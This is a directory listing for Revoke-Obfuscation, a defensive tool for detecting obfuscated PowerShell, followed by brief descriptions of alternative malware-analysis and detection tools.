Revoke-Obfuscation v1.0 Logo

Revoke-Obfuscation v1.0

0
Free
Visit Website

Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. It was designed to highlight the limitations of a purely signature-based approach to detecting attackers' usage of PowerShell. It provides a new, scalable means of generically detecting both known and unknown obfuscation techniques. Authors: Daniel Bohannon (@danielhbohannon) Lee Holmes (@Lee_Homes) Research Blog Post: https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html White Paper: https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf

FEATURES

ALTERNATIVES

Leading open source automated malware analysis system.

A tool for translating Dalvik bytecode to equivalent Java bytecode, allowing Java analysis tools to analyze Android applications.

A tool that recovers passwords from pixelized screenshots

A collection of Yara rules for identifying malicious PEs with unique or suspicious PDB paths.

Scans running processes for potentially malicious implants and dumps them.

Code to prevent a managed .NET debugger/profiler from working.

A tool that scans a corpus of malware and builds a YARA rule to detect similar code sections.

A collection of YARA rules for public use, built from intelligence profiles and file work.

PINNED